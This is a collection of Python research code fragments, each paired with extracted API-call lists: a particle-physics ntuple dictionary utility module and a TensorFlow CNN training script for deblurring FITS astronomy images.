script_name=__file__) # Create output directory, instantiate log file and write config options out_dir = os.path.expanduser(config['out_dir']) if not os.path.exists(out_dir): os.makedirs(out_dir) with open(os.path.join(out_dir, config_fn), 'w') as outfile: yaml.dump(config, outfile) utils.copyFile(__file__, out_dir) main(**config)
[ "numpy.full", "mathtools.utils.copyFile", "kinemparse.airplanecorpus.loadHandDetections", "os.path.join", "os.makedirs", "kinemparse.airplanecorpus.loadParts", "yaml.dump", "os.path.exists", "mathtools.utils.plot_array", "numpy.isnan", "kinemparse.airplanecorpus.loadLabels", "mathtools.utils.parse_config", "mathtools.utils.stripExtension", "mathtools.utils.parse_args", "os.path.expanduser", "logging.getLogger", "numpy.nanmean" ]
[((161, 188), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (178, 188), False, 'import logging\n'), ((343, 382), 'numpy.full', 'np.full', (['num_samples', 'no_bin'], {'dtype': 'int'}), '(num_samples, no_bin, dtype=int)\n', (350, 382), True, 'import numpy as np\n'), ((749, 788), 'os.path.expanduser', 'os.path.expanduser', (['hand_detections_dir'], {}), '(hand_detections_dir)\n', (767, 788), False, 'import os\n'), ((806, 836), 'os.path.expanduser', 'os.path.expanduser', (['labels_dir'], {}), '(labels_dir)\n', (824, 836), False, 'import os\n'), ((852, 879), 'os.path.expanduser', 'os.path.expanduser', (['out_dir'], {}), '(out_dir)\n', (870, 879), False, 'import os\n'), ((965, 994), 'os.path.join', 'os.path.join', (['out_dir', '"""data"""'], {}), "(out_dir, 'data')\n", (977, 994), False, 'import os\n'), ((1085, 1117), 'os.path.join', 'os.path.join', (['out_dir', '"""figures"""'], {}), "(out_dir, 'figures')\n", (1097, 1117), False, 'import os\n'), ((1696, 1728), 'os.path.join', 'os.path.join', (['out_dir', '"""figures"""'], {}), "(out_dir, 'figures')\n", (1708, 1728), False, 'import os\n'), ((1814, 1843), 'os.path.join', 'os.path.join', (['out_dir', '"""data"""'], {}), "(out_dir, 'data')\n", (1826, 1843), False, 'import os\n'), ((1976, 2002), 'kinemparse.airplanecorpus.loadParts', 'airplanecorpus.loadParts', ([], {}), '()\n', (2000, 2002), False, 'from kinemparse import airplanecorpus\n'), ((3214, 3236), 'mathtools.utils.parse_args', 'utils.parse_args', (['main'], {}), '(main)\n', (3230, 3236), False, 'from mathtools import utils\n'), ((3261, 3310), 'mathtools.utils.parse_config', 'utils.parse_config', (['cl_args'], {'script_name': '__file__'}), '(cl_args, script_name=__file__)\n', (3279, 3310), False, 'from mathtools import utils\n'), ((3403, 3440), 'os.path.expanduser', 'os.path.expanduser', (["config['out_dir']"], {}), "(config['out_dir'])\n", (3421, 3440), False, 'import os\n'), ((3610, 3643), 'mathtools.utils.copyFile', 'utils.copyFile', (['__file__', 'out_dir'], {}), '(__file__, out_dir)\n', (3624, 3643), False, 'from mathtools import utils\n'), ((891, 914), 'os.path.exists', 'os.path.exists', (['out_dir'], {}), '(out_dir)\n', (905, 914), False, 'import os\n'), ((924, 944), 'os.makedirs', 'os.makedirs', (['out_dir'], {}), '(out_dir)\n', (935, 944), False, 'import os\n'), ((1006, 1034), 'os.path.exists', 'os.path.exists', (['out_data_dir'], {}), '(out_data_dir)\n', (1020, 1034), False, 'import os\n'), ((1044, 1069), 'os.makedirs', 'os.makedirs', (['out_data_dir'], {}), '(out_data_dir)\n', (1055, 1069), False, 'import os\n'), ((1129, 1152), 'os.path.exists', 'os.path.exists', (['fig_dir'], {}), '(fig_dir)\n', (1143, 1152), False, 'import os\n'), ((1162, 1182), 'os.makedirs', 'os.makedirs', (['fig_dir'], {}), '(fig_dir)\n', (1173, 1182), False, 'import os\n'), ((1524, 1560), 'os.path.join', 'os.path.join', (['out_dir', '"""results.csv"""'], {}), "(out_dir, 'results.csv')\n", (1536, 1560), False, 'import os\n'), ((1621, 1653), 'os.path.expanduser', 'os.path.expanduser', (['results_file'], {}), '(results_file)\n', (1639, 1653), False, 'import os\n'), ((1740, 1763), 'os.path.exists', 'os.path.exists', (['fig_dir'], {}), '(fig_dir)\n', (1754, 1763), False, 'import os\n'), ((1773, 1793), 'os.makedirs', 'os.makedirs', (['fig_dir'], {}), '(fig_dir)\n', (1784, 1793), False, 'import os\n'), ((1855, 1883), 'os.path.exists', 'os.path.exists', (['out_data_dir'], {}), '(out_data_dir)\n', (1869, 1883), False, 'import os\n'), ((1893, 1918), 'os.makedirs', 'os.makedirs', (['out_data_dir'], {}), '(out_data_dir)\n', (1904, 1918), False, 'import os\n'), ((2240, 2333), 'kinemparse.airplanecorpus.loadHandDetections', 'airplanecorpus.loadHandDetections', (['video_id'], {'dir_name': 'hand_detections_dir', 'unflatten': '(True)'}), '(video_id, dir_name=hand_detections_dir,\n unflatten=True)\n', (2273, 2333), False, 'from kinemparse import airplanecorpus\n'), ((2457, 2484), 'numpy.nanmean', 'np.nanmean', (['hand_detections'], {}), '(hand_detections)\n', (2467, 2484), True, 'import numpy as np\n'), ((2578, 2678), 'kinemparse.airplanecorpus.loadLabels', 'airplanecorpus.loadLabels', (['video_id'], {'dir_name': 'labels_dir', 'part_names_to_idxs': 'part_names_to_idxs'}), '(video_id, dir_name=labels_dir, part_names_to_idxs\n =part_names_to_idxs)\n', (2603, 2678), False, 'from kinemparse import airplanecorpus\n'), ((2822, 2862), 'os.path.join', 'os.path.join', (['fig_dir', 'f"""{video_id}.png"""'], {}), "(fig_dir, f'{video_id}.png')\n", (2834, 2862), False, 'import os\n'), ((2871, 2942), 'mathtools.utils.plot_array', 'utils.plot_array', (['hand_detections.T', '(bin_labels,)', "('bin',)"], {'fn': 'fig_fn'}), "(hand_detections.T, (bin_labels,), ('bin',), fn=fig_fn)\n", (2887, 2942), False, 'from mathtools import utils\n'), ((3452, 3475), 'os.path.exists', 'os.path.exists', (['out_dir'], {}), '(out_dir)\n', (3466, 3475), False, 'import os\n'), ((3485, 3505), 'os.makedirs', 'os.makedirs', (['out_dir'], {}), '(out_dir)\n', (3496, 3505), False, 'import os\n'), ((3579, 3605), 'yaml.dump', 'yaml.dump', (['config', 'outfile'], {}), '(config, outfile)\n', (3588, 3605), False, 'import yaml\n'), ((1246, 1291), 'os.path.join', 'os.path.join', (['out_data_dir', 'f"""{var_name}.pkl"""'], {}), "(out_data_dir, f'{var_name}.pkl')\n", (1258, 1291), False, 'import os\n'), ((1338, 1370), 'os.path.join', 'os.path.join', (['out_dir', '"""log.txt"""'], {}), "(out_dir, 'log.txt')\n", (1350, 1370), False, 'import os\n'), ((2041, 2083), 'os.path.join', 'os.path.join', (['hand_detections_dir', '"""*.txt"""'], {}), "(hand_detections_dir, '*.txt')\n", (2053, 2083), False, 'import os\n'), ((2509, 2534), 'numpy.isnan', 'np.isnan', (['hand_detections'], {}), '(hand_detections)\n', (2517, 2534), True, 'import numpy as np\n'), ((3520, 3552), 'os.path.join', 'os.path.join', (['out_dir', 'config_fn'], {}), '(out_dir, config_fn)\n', (3532, 3552), False, 'import os\n'), ((2106, 2130), 'mathtools.utils.stripExtension', 'utils.stripExtension', (['fn'], {}), '(fn)\n', (2126, 2130), False, 'from mathtools import utils\n')]
"""Basic operations on ntuple dicts and track property dicts.""" from random import shuffle from random import seed as set_seed from copy import deepcopy from functools import reduce from math import inf from warnings import warn from numpy import cumsum from numpy import array from numpy import delete from numpy import where def add_ntuple_dicts(ntuple_dicts): """Adds together multiple ntuple dicts of with the same track types and track type properties. Raises an exception if the dicts do not have this "sameness" property. Args: ntuple_dicts: a list of ntuple dicts with the same track types and track type properties. Returns: An ntuple dictionary with the lists of values of each ntuple dict in the input list concatenated. """ track_types = iter(next(iter(ntuple_dicts)).keys()) return dict(map(lambda track_type: (track_type, add_track_prop_dicts( list(map(lambda ntuple_dict: ntuple_dict[track_type], ntuple_dicts)))), track_types)) def add_track_prop_dicts(track_prop_dicts): """Adds together multiple track properties dicts of with the same properties. Args: track properties_dicts: a list of track properties dicts with the same properties. Returns: A track properties dictionary with the lists of values of each track properties dict in the input list concatenated. Raises: ValueError: if there is no property shared by all of the track property dicts. """ def add_two_track_prop_dicts(tp_so_far, tp_to_add): """Adds two track properties dicts together as per rules in parent function. Returns the sum.""" props_in_common = set(tp_so_far.keys()).intersection( set(tp_to_add.keys())) if props_in_common != set(tp_to_add.keys()): warn("Track property dicts have differing value lists. " "Will add only properties in common: {}" .format(props_in_common), UserWarning) if not len(props_in_common): raise ValueError("Track property dicts to add have no properties " "in common.") return dict(map(lambda track_property: (track_property, tp_so_far[track_property] + tp_to_add[track_property]), props_in_common)) return reduce(add_two_track_prop_dicts, track_prop_dicts) def mix_track_prop_dicts(track_prop_dicts, seed=None): """Mixes together multiple track properties dicts with the same properties. 'Mixing', in this context, means to cut all other dicts in the list down to the size of the smallest, and then shuffle them all together. Args: track properties_dicts: a list of track properties dicts with the same properties. seed: a seed for the random shuffling for reproducability. Returns: A track properties dictionary containing an equal amount of tracks from each track properties dictionary in the input list. Raises: ValueError: if there is no property shared by all of the track property dicts. """ min_tpd_size = min(map(track_prop_dict_length, track_prop_dicts)) return shuffle_track_prop_dict(add_track_prop_dicts(map( lambda tpd: reduce_track_prop_dict(tpd, min_tpd_size, seed), track_prop_dicts)), seed=seed) def ntuple_dict_length(ntuple_dict): """Returns a dictionary from track types to the number of tracks of that type. Raises an exception of any value lists within one of its track properties dicts are different lengths.""" return dict(map(lambda track_type, track_prop_dict: (track_type, track_prop_dict_length(track_prop_dict)), ntuple_dict.keys(), ntuple_dict.values())) def track_prop_dict_length(track_prop_dict): """Returns the number of tracks in a track properties dictionary. Raises an exception if the value lists in the input dictionary are not all of the same length. Returns zero if the track properties dict is empty.""" # A fancy way of checking if all value lists are the same length val_list_lengths = set(map(len, track_prop_dict.values())) if len(val_list_lengths) > 1: raise ValueError("Invalid track prop dictionary: " "value lists are of different sizes") if len(val_list_lengths) == 0: return 0 return next(iter(val_list_lengths)) class TrackPropertyDictIterator: """Iterates through tracks in a track properties dict, where each track is represented as a dictionary from a value name to a single property. Does not alter the original track properties dict.""" def __init__(self, track_prop_dict, increment=1): self.tpd = deepcopy(track_prop_dict) self.track_index = -1 self.increment = increment self.num_tracks = track_prop_dict_length(track_prop_dict) def __iter__(self): return self def __next__(self): self.track_index += self.increment if self.track_index < self.num_tracks: return self._grab_track_by_index(self.tpd, self.track_index) raise StopIteration def _grab_track_by_index(self, track_prop_dict, track_index): """Returns a dictionary from track properties to single values by selecting that value from each list in the track properties dict.""" return dict(map(lambda property_name, val_list: (property_name, val_list[track_index]), track_prop_dict.keys(), track_prop_dict.values())) def shuffle_ntuple_dict(ntuple_dict, seed=None): """Returns an ntuple dict whose value lists have been shuffled. To preserve association between them, value lists of trk and matchtp as well as ones for tp and matchtrk have been shuffled in the same way. Args: ntuple_dict: an ntuple dictionary. seed: a seed for the random shuffling for reproducability. Returns: An ntuple dict with its value lists shuffled, preserving the association between complementary track types. """ # Generate shuffled indices dictionary ntuple_dict_num_tracks = ntuple_dict_length(ntuple_dict) shuffled_indices_dict = {"trk": [], "matchtrk": [], "tp": [], "matchtp": []} set_seed(seed) def generate_shuffled_indices_dict_pair(track_type, track_prop_dict): """Generates a pair to be used in the construction of a shuffled indices dictionary.""" tpd_indices = list(range(track_prop_dict_length(track_prop_dict))) shuffle(tpd_indices) return track_type, tpd_indices shuffled_indices_dict.update(dict(map(generate_shuffled_indices_dict_pair, ntuple_dict.keys(), ntuple_dict.values()))) # Ensure that the ntuple dict num tracks dict has the appropriate # number of keys ntuple_dict_num_tracks.update(dict(map(lambda track_type, indices: (track_type, len(indices)), shuffled_indices_dict.keys(), shuffled_indices_dict.values()))) # Ensure that same-length, complementary track types shuffle the same if ntuple_dict_num_tracks["trk"] == ntuple_dict_num_tracks["matchtp"]: shuffled_indices_dict["trk"] = shuffled_indices_dict["matchtp"] if ntuple_dict_num_tracks["matchtrk"] == ntuple_dict_num_tracks["tp"]: shuffled_indices_dict["matchtrk"] = shuffled_indices_dict["tp"] return dict(map(lambda track_type, track_prop_dict: (track_type, shuffle_track_prop_dict( track_prop_dict, shuffled_indices_dict[track_type], seed)), ntuple_dict.keys(), ntuple_dict.values())) def shuffle_track_prop_dict(track_prop_dict, shuffled_indices=None, seed=None): """Returns a track properties dict whose value lists have been shuffled. Args: track_prop_dict: a track properties dictionary. shuffled_indices: a complete list of indices in the range of the number of tracks in this track properties dict. Used to completely determine a shuffling. seed: a seed for the random shuffling for reproducability. Returns: A track properties dict whose value lists have been shuffled. Raises: ValueError: if shuffled_indices is different length than track_prop_dict. """ def generate_shuffled_indices(tpd_length): """Generates a list of shuffled indices for use in shuffling tracks in this track property dictionary.""" tpd_indices = list(range(tpd_length)) set_seed(seed) shuffle(tpd_indices) return tpd_indices def shuffle_val_list(val_list, shuffled_indices): """Shuffles a value list depending on whether there are shuffled indices or a random seed provided.""" return list(map(lambda i: val_list[i], shuffled_indices)) tpd_length = track_prop_dict_length(track_prop_dict) if shuffled_indices is None: shuffled_indices = generate_shuffled_indices(tpd_length) if len(shuffled_indices) != tpd_length: raise ValueError("shuffled_indices arg length ({}) differs from " "track_prop_dict length ({})." .format(len(shuffled_indices), tpd_length)) return dict(map(lambda property_name, val_list: (property_name, shuffle_val_list(val_list, shuffled_indices)), track_prop_dict.keys(), track_prop_dict.values())) def reduce_ntuple_dict(ntuple_dict, track_limit, shuffle_tracks=False, seed=None): """Reduces an ntuple dictionary to a number of tracks. If number of tracks in the ntuple is less than the track limit specified, returns all tracks. Can be used for convenient print debugging. Does not affect the original ntuple dictionary. Args: ntuple_dict: an ntuple dict. track_limit: number of tracks to retain in each value list. Or, an integer that will be expanded into a corresponding dictionary. shuffle_tracks: if True, shuffles the value lists before reducing. seed: a seed for the shuffling, for reproducability. Returns: An ntuple dictionary with track_limit tracks. """ # Get track_limit into correct form if it's an int if isinstance(track_limit, int): track_limit = dict(map(lambda track_type: (track_type, track_limit), ntuple_dict.keys())) if shuffle_tracks: ntuple_dict = shuffle_ntuple_dict(ntuple_dict, seed) return dict(map(lambda track_type, track_prop_dict: (track_type, reduce_track_prop_dict( track_prop_dict, track_limit[track_type], shuffle_tracks=False)), ntuple_dict.keys(), ntuple_dict.values())) def reduce_track_prop_dict(track_prop_dict, track_limit, min_index=0, shuffle_tracks=True, seed=None): """Reduces a track properties dictionary such that each of its value lists are only a certain length. Does not affect the original track property dictionary. Args: track_prop_dict: a track properties dict. track_limit: the maximum length for a value list. min_index: the first index to include in the result. shuffle_tracks: if True, shuffles the value lists before reducing. seed: a seed for the shuffling, for reproducability. Returns: A track properties dictionary with reduced-length value lists. """ if shuffle_tracks: track_prop_dict = shuffle_track_prop_dict(track_prop_dict, seed=seed) return dict(map(lambda track_prop, track_prop_vals: (track_prop, track_prop_vals[min_index:min(track_limit + min_index, len(track_prop_vals))]), track_prop_dict.keys(), track_prop_dict.values())) def split_track_prop_dict(track_prop_dict, split_list): """Splits a track properties dict into smaller ones according to the relative sizes of split_list elements. There is no option to shuffle these, as the dict can be shuffled before splitting. Args: track_prop_dict: a track properties dict. split_list: a list of positive values that determine the number and relative sizes of the post-split track property dicts. Returns: A list of track property dicts. """ def get_split_sizes(split_list, num_tracks): """Returns the sizes of data by normalizing the provided split distribution and mutliplying by the number of tracks in such a way that the resulting sizes add up to the original tracks.""" split_list_total = sum(split_list) split_sizes = list(map(lambda split_val: int(split_val * num_tracks / split_list_total), split_list)) # Ensure the split sizes add up to the total number of tracks split_sizes[-1] += num_tracks - sum(split_sizes) return split_sizes split_boundaries = [0] + list(cumsum(get_split_sizes(split_list, track_prop_dict_length(track_prop_dict)))) return list(map(lambda start_index, end_index: reduce_track_prop_dict(track_prop_dict, end_index - start_index, start_index, shuffle_tracks=False), split_boundaries[:-1], split_boundaries[1:])) def select(*selector_key, invert=False): """Takes in a selector key and returns a selector that returns true for selected values and false for non-selected values. This is how cuts are applied in ntupledicts. Args: selector_key: If a single number, the selector will return true for that number. If two numbers, the selector will return true for numbers in that range, inclusive. If a list, will treat each element of a list as a selector and logical OR them together. This is done instead of AND, as AND can simply be achieved by applying multiple selectors. invert: Invert the selection. False by default. Returns: A selector, a function that returns true for some values and false for all others. Raises: ValueError: for invalid selector keys. """ if len(selector_key) == 1: key_contents = next(iter(selector_key)) if isinstance(key_contents, list): selector = lambda val: any(map( lambda sub_selector: sub_selector(val), key_contents)) elif isinstance(key_contents, (float, int)): selector = lambda val: val == next(iter(selector_key)) else: raise ValueError("Invalid selector key type: {}." .format(type(key_contents))) elif len(selector_key) == 2: selector = lambda val: selector_key[0] <= val <= selector_key[1] else: raise ValueError("Invalid selector key length: {}. Read the docs!" .format(selector_key)) return lambda val: invert != selector(val) def cut_ntuple_dict(ntuple_dict, nd_selector): """Cuts an ntuple dictionary by cutting each track type according to a selector dictionary, cutting those tracks not selected. Tracks are cut "symmetrically" across corresponding groups, meaning that any cuts applied to trks are applied to matchtps, and from tps to matchtrks, and vice versa. Args: ntuple_dict: an ntuple dictionary nd_selector: a selector for an ntuple dict Returns: A cut ntuple dictionary """ # Build list of tracks to cut from tp/matchtrk group and trk/matchtp groups cut_indices_dict = {"trk": [], "matchtrk": [], "tp": [], "matchtp": []} cut_indices_dict.update(dict(map(lambda track_type, cut_dict: (track_type, select_indices( ntuple_dict[track_type], cut_dict)), nd_selector.keys(), nd_selector.values()))) # Combine trk and matchtp, tp and matchtrk indices # Sort and remove duplicates trk_matchtp_indices_to_cut = sorted( list(dict.fromkeys(cut_indices_dict["trk"] +\ cut_indices_dict["matchtp"]))) tp_matchtrk_indices_to_cut = sorted( list(dict.fromkeys(cut_indices_dict["tp"] +\ cut_indices_dict["matchtrk"]))) cut_ntuple_dict = {} for track_type in ntuple_dict.keys(): if track_type in ["trk", "matchtp"]: indices_to_cut = trk_matchtp_indices_to_cut if track_type in ["tp", "matchtrk"]: indices_to_cut = tp_matchtrk_indices_to_cut cut_ntuple_dict[track_type] = cut_track_prop_dict_by_indices( ntuple_dict[track_type], indices_to_cut) return cut_ntuple_dict def cut_track_prop_dict(track_prop_dict, tpd_selector): """Cuts an track properties dictionary by cutting each track type according to a cut dictionary. Args: track_prop_dict: a tracks properties dictionary. tpd_selector: a selector for a tracks properties dictionary. Returns: A cut tracks properties dictionary. """ return cut_track_prop_dict_by_indices(track_prop_dict, select_indices(track_prop_dict, tpd_selector)) def select_indices(track_prop_dict, tpd_selector, invert=True): """Selects indices from a tracks properties dictionary that meet the conditions of the selector dictionary. If a property is in the selector dict but not in the tracks properties dict, the program won't raise an exception, but will print a message. Args: track_prop_dict: a tracks properties dictionary. tpd_selector: a dictionary from track property names to selectors. invert: return all indices NOT selected. Default is True. This jibes with how this function is mainly used: track cuts. Returns: Indices from the track properties dict selected by the selector dict. """ # Determine which selection conditions will be applied for track_property in list(tpd_selector.keys()): if track_property not in track_prop_dict.keys(): warn("{} not in tracks properties; will not select" .format(track_property), UserWarning) tpd_selector.pop(track_property) tpd_length = track_prop_dict_length(track_prop_dict) return list(set(sum(map(lambda track_property, selector: list(where([invert != selector(val) for val in\ track_prop_dict[track_property]])[0]), tpd_selector.keys(), tpd_selector.values()), []))) def cut_track_prop_dict_by_indices(track_prop_dict, indices_to_cut): """Takes in a list of indices to cut and cuts those indices from the lists of the dictionary. Assumes that all lists in track_prop_dict are the same size. This list of indices will frequently be generated using get_indices_meeting_condition. The list of indices does not have to be sorted by size. Args: track_prop_dict: a tracks properties dictionary. indices_to_cut: a collection of indices to cut. Repeats are tolerated, but out-of-range indices will result in an exception. Returns: The same tracks properties dictionary with the given indices on its value lists removed. """ track_properties = track_prop_dict.keys() post_cuts_track_prop_dict = {} for track_property in track_properties: post_cuts_track_prop_dict[track_property] = list(delete( array(track_prop_dict[track_property]), indices_to_cut)) return post_cuts_track_prop_dict def normalize_ntuple_dict(ntuple_dict, normalize_dict=None): """Normalizes each value list in an ntuple dict. Does not attempt to normalize values of the same property but different track types in the same way. Args: ntuple_dict: an ntuple dict. normalize_dict: a dictionary from track types to lists of properties to normalize of that track type. If None, normalizes all value lists. Returns: An ntuple dict with the appropriate value lists normalized. """ base_normalize_dict = dict(map(lambda track_type: (track_type, None), ntuple_dict.keys())) base_normalize_dict.update(normalize_dict) return dict(map(lambda track_type: (track_type, normalize_track_prop_dict(ntuple_dict[track_type], base_normalize_dict[track_type])), base_normalize_dict.keys())) def normalize_track_prop_dict(track_prop_dict, props_to_normalize=None): """Returns a track prop dict of the same form as the original, but each value list has been divided by its highest value. All values are normalized by default, but only some will be normalized if a list is given.""" if props_to_normalize is None: props_to_normalize = list(track_prop_dict.keys()) else: for track_property in props_to_normalize: if track_property not in list(track_prop_dict.keys()): warn("{} not in tracks properties; will not normalize" .format(track_property), UserWarning) return dict(map(lambda track_property: (track_property, normalize_val_list(track_prop_dict[track_property])), props_to_normalize)) def normalize_val_list(val_list): """Returns a list of numeric values by the size of their maximum value.""" max_val = float(max(val_list)) return [ val/max_val if max_val != 0 else 0 for val in val_list ]
[ "copy.deepcopy", "random.shuffle", "random.seed", "numpy.array", "functools.reduce" ]
[((2434, 2484), 'functools.reduce', 'reduce', (['add_two_track_prop_dicts', 'track_prop_dicts'], {}), '(add_two_track_prop_dicts, track_prop_dicts)\n', (2440, 2484), False, 'from functools import reduce\n'), ((6406, 6420), 'random.seed', 'set_seed', (['seed'], {}), '(seed)\n', (6414, 6420), True, 'from random import seed as set_seed\n'), ((4861, 4886), 'copy.deepcopy', 'deepcopy', (['track_prop_dict'], {}), '(track_prop_dict)\n', (4869, 4886), False, 'from copy import deepcopy\n'), ((6684, 6704), 'random.shuffle', 'shuffle', (['tpd_indices'], {}), '(tpd_indices)\n', (6691, 6704), False, 'from random import shuffle\n'), ((8647, 8661), 'random.seed', 'set_seed', (['seed'], {}), '(seed)\n', (8655, 8661), True, 'from random import seed as set_seed\n'), ((8670, 8690), 'random.shuffle', 'shuffle', (['tpd_indices'], {}), '(tpd_indices)\n', (8677, 8690), False, 'from random import shuffle\n'), ((19731, 19769), 'numpy.array', 'array', (['track_prop_dict[track_property]'], {}), '(track_prop_dict[track_property])\n', (19736, 19769), False, 'from numpy import array\n')]
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Sat Jun 16 17:03:00 2018 @author: jumtsai """ from __future__ import absolute_import from __future__ import division from __future__ import print_function '''Import this part for using Tensor Board to visualizing each nodes in CNN. ''' #DCNN's TensorFlow(GPU) Version from astropy.io import fits import os, glob, time import logging,logging.handlers import numpy as np import tensorflow as tf from manager import GPUManager os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' os.environ["CUDA_VISIBLE_DEVICES"] = "0,1" #--------------------------------Envir Default---------------------------------# gm = GPUManager() max_step=150 log_dir='CNNinfo/' save_dir=log_dir+'restore/' checkpoint_dir=log_dir+'model/' num,weight,height=(1,4096,4096) #--------------------------------Logging Module--------------------------------# LOG_FILE = log_dir+'train_detail.log' if os.path.isfile(LOG_FILE) is True: os.remove(LOG_FILE) handler = logging.handlers.RotatingFileHandler(LOG_FILE, maxBytes = 10*1024*1024, backupCount = 5) fmt = '%(asctime)s - %(filename)s:%(lineno)s - %(name)s - %(message)s' formatter = logging.Formatter(fmt) handler.setFormatter(formatter) logger = logging.getLogger('train_detail') logger.addHandler(handler) logger.setLevel(logging.DEBUG) #----------------------------------Function------------------------------------# def Padding(Input,ker_size): '''Image Padding Function ''' xpadpre = int(np.floor(ker_size[0]/2.0)) xpadpost = ker_size[0] - xpadpre ypadpre = int(np.floor(ker_size[1]/2.0)) ypadpost = ker_size[1] - ypadpre paddings = [[0,0],[xpadpre,xpadpost],[ypadpre,ypadpost],[0,0]] padded = tf.pad(Input,paddings,"SYMMETRIC") return padded def batch_normal(input,is_train ,is_out=True,decay=0.9999): with tf.name_scope('BN'): scale=tf.Variable(tf.ones([input.get_shape()[-1]])) beta=tf.Variable(tf.zeros([input.get_shape()[-1]])) pop_mean=tf.Variable(tf.zeros([input.get_shape()[-1]]),trainable=False) pop_var=tf.Variable(tf.ones([input.get_shape()[-1]]),trainable=False) if is_train: if is_out: batch_mean,batch_var = tf.nn.moments(input,[0,1,2]) else: batch_mean,batch_var = tf.nn.moments(input,[0]) train_mean = tf.assign(pop_mean,pop_mean*decay+batch_mean*(1-decay)) train_var = tf.assign(pop_var,pop_var*decay+batch_var*(1-decay)) with tf.control_dependencies([train_mean,train_var]): return tf.nn.batch_normalization(input,batch_mean,batch_var,beta,scale,0.0001) else: return tf.nn.batch_normalization(input,pop_mean,pop_var,beta,scale,0.0001) def Conv_Layer(Input, k_num, k_size, p_size = 2, activity_func = None): '''Add convolutional layer Function, if tensor is Input, output size would be smaller than Input size. ''' with tf.name_scope('Convolutional_Layer'): padded = Padding(Input, k_size) raw_image = tf.layers.Input(tensor = padded) shape=raw_image.get_shape().as_list() weights = tf.Variable(tf.truncated_normal([k_size[0],k_size[1],int(shape[3]),k_num],stddev=15.0,dtype=tf.float32)) biases = tf.Variable(tf.truncated_normal([k_num],stddev=5.0,dtype=tf.float32)) unBN = tf.add(tf.nn.conv2d(raw_image, weights, strides=[1, 1, 1, 1], padding='VALID'), biases) Conv = batch_normal(unBN,is_train=True) if activity_func is not None: Act =activity_func(Conv,) down_sample = tf.layers.max_pooling2d(Act, p_size, strides = 1, padding = 'valid') else: down_sample = tf.layers.max_pooling2d(Conv, p_size, strides = 1, padding = 'valid') return down_sample def Block(feature, num, kernel): c_in = Conv_Layer(feature, num, [kernel,1], activity_func = tf.nn.relu) c_out= Conv_Layer(c_in, num, [1,kernel], activity_func = tf.nn.relu) return c_out -c_in def mse(r,x): with gm.auto_choice(mode=0): return tf.reduce_mean(tf.square(r-x)) def tobatch(array,w,h): pixelsize=array.shape[0]*array.shape[1] batch=np.zeros([int(pixelsize/(h*w)),w,h],dtype=np.dtype('>i2')) k=0 for i in range(int(array.shape[0]/h)): for j in range(int(array.shape[1]/w)): batch[k]=array[h*i:h*(i+1),w*j:w*(j+1)] k+=1 return batch def toarray(mesh): n,w,h=mesh.shape n_w=n_h=int(np.sqrt(n*w*h)) grid=np.sqrt(n) array=np.zeros([n_w,n_h]) for i in range(n): m=int(i/grid) n=int(i%grid) array[m*w:(m+1)*w,n*h:(n+1)*h]=mesh[i] return array #------------------------------------Input-------------------------------------# with tf.name_scope('Placeholder'): blur = tf.placeholder(tf.float32,[1 ,4096, 4096, 1], name='Blur') oril = tf.placeholder(tf.float32,[1 ,4096, 4096, 1], name='Oril') imgsize = oril.get_shape().as_list() batch_size = imgsize[0] tf.summary.image('Blur_input', blur, 10) tf.summary.image('Oril_input', oril, 10) #-----------------------------Add Hidden Layers--------------------------------# with tf.name_scope('Hidden_Layer'): #Using multi GPUs with gm.auto_choice(mode=0): #Allocating single GPUs cl1 = Conv_Layer(blur, 16, [63,63], activity_func = tf.nn.relu) cl2 = Block(cl1-blur, 16, 63) cl3 = Block(cl2, 32, 31) cl4 = Block(cl3, 64, 15) cl5 = Block(cl4,128, 11) cl6 = Block(cl5, 144, 9) cl7 = Block(cl6, 192, 7) cl8 = Block(cl7, 256, 5) cl9 = Block(cl8, 512, 3) cl10 = Block(cl9,1024, 1) dense = tf.layers.dense(cl10, 1) #dc3 = DeConv_Layer(cl3,12,1,activity_func = tf.nn.relu) with tf.name_scope('Loss'): pre = tf.reshape(dense,imgsize)+blur loss=mse(pre,oril) tf.summary.image('Output', pre, 10) tf.summary.scalar('loss', loss) with tf.name_scope('Train'): step=tf.Variable(0,trainable=False) learnrate=tf.train.exponential_decay(5.0, step, 100, 0.96, staircase = True) train_step = tf.train.AdadeltaOptimizer(learnrate).minimize(loss, global_step = step) #---------------------------------Read Data------------------------------------# files=glob.glob('gauss127/*.fits') files.sort(reverse = True) trainset=open('train.txt','r') train=[] for trainname in trainset: train.append(trainname.split('\n')[0]) #-----------------------------------Initiate-----------------------------------# init = tf.global_variables_initializer() config = tf.ConfigProto() config.gpu_options.allow_growth=True config.gpu_options.allocator_type = 'BFC' with tf.Session(config = config) as sess: sess.run(init) merged = tf.summary.merge_all() train_writer = tf.summary.FileWriter(log_dir + 'train', sess.graph) test_writer = tf.summary.FileWriter(log_dir + 'test', sess.graph) saver = tf.train.Saver(max_to_keep=128) sess.graph.finalize() #----------------------------------Iteration-----------------------------------# for epoch in range(1,max_step+1): trainloss = [] testloss = [] s=time.clock() for fitsfile in files: name=fitsfile.split('/')[-1] blurred=fits.open('gauss127/'+name)[0].data try: original=fits.open('original/'+name)[0].data except IOError: original=np.zeros(blurred.shape) blurred=tobatch(blurred,weight,height) original=tobatch(original,weight,height) blurred=blurred.reshape([num,weight,height,1]) original=original.reshape([num,weight,height,1]) if name in train: epoch_result =np.zeros([num,weight,height]) for batch in range(0,num): Input_x=np.zeros([1,weight,height,1],dtype=np.float32) Input_y=np.zeros([1,weight,height,1],dtype=np.float32) Input_x[0]=np.float32(blurred[batch]) Input_y[0]=np.float32(original[batch]) _,lvalue,summary,result=sess.run([train_step,loss,merged,pre], feed_dict={blur:Input_x,oril:Input_y}) train_writer.add_summary(summary, epoch) saver.save(sess, checkpoint_dir + 'model'+str(batch)+'.ckpt', global_step=batch+1,write_meta_graph=False,write_state=False) epoch_result[batch]=result.reshape(weight,height) epoch_result=toarray(epoch_result) recon=np.int16(epoch_result) trainloss.append(lvalue) train_writer.close() if os.path.isfile(save_dir+'Train_'+name) is True: os.remove(save_dir+'Train_'+name) fits.HDUList([fits.PrimaryHDU(recon)]).writeto(save_dir+'Train_'+name) else: epoch_result =np.zeros([num,weight,height]) for batch in range(0,num): Input_x=np.zeros([1,weight,height,1],dtype=np.float32) Input_y=np.zeros([1,weight,height,1],dtype=np.float32) Input_x[0]=np.float32(blurred[batch]) Input_y[0]=np.float32(original[batch]) saver.restore(sess, checkpoint_dir +'model'+str(batch)+'.ckpt-'+str(batch+1)) 